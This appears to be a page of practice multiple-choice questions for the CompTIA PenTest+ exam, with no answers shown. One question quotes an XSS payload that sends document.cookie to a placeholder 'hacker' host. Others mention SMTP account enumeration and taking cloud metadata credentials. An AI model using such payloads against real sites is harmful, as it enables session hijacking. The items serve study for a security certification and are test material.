CompTIA PT0-002 CompTIA PenTest+ Certification Exam Online Training
CompTIA PT0-002 Online Training
The questions for PT0-002 were last updated on Mar 01, 2025.
- Exam Code: PT0-002
- Exam Name: CompTIA PenTest+ Certification Exam
- Certification Provider: CompTIA
- Latest update: Mar 01, 2025
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?
- A . VRFY and EXPN
- B . VRFY and TURN
- C . EXPN and TURN
- D . RCPT TO and VRFY
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- A . Executive summary of the penetration-testing methods used
- B . Bill of materials including supplies, subcontracts, and costs incurred during assessment
- C . Quantitative impact assessments given a successful software compromise
- D . Code context for instances of unsafe type-casting operations
A penetration tester performs the following command:
curl -I --http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A . Option A
- B . Option B
- C . Option C
- D . Option D
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself.
Which of the following vulnerabilities has the tester exploited?
- A . Cross-site request forgery
- B . Server-side request forgery
- C . Remote file inclusion
- D . Local file inclusion
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks.
Which of the following methodologies should be used to BEST meet the client’s expectations?
- A . OWASP Top 10
- B . MITRE ATT&CK framework
- C . NIST Cybersecurity Framework
- D . The Diamond Model of Intrusion Analysis
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent this type of attack? (Choose two.)
- A . Web-application firewall
- B . Parameterized queries
- C . Output encoding
- D . Session tokens
- E . Input validation
- F . Base64 encoding
A client evaluating a penetration testing company requests examples of its work.
Which of the following represents the BEST course of action for the penetration testers?
- A . Redact identifying information and provide a previous customer’s documentation.
- B . Allow the client to only view the information while in secure spaces.
- C . Determine which reports are no longer under a period of confidentiality.
- D . Provide raw output from penetration testing tools.
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
- A . Nessus
- B . Metasploit
- C . Burp Suite
- D . Ettercap
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
- A . chmod u+x script.sh
- B . chmod u+e script.sh
- C . chmod o+e script.sh
- D . chmod o+x script.sh
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades-old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability.
Which of the following should the penetration tester consider BEFORE running a scan?
- A . The timing of the scan
- B . The bandwidth limitations
- C . The inventory of assets and versions
- D . The type of scan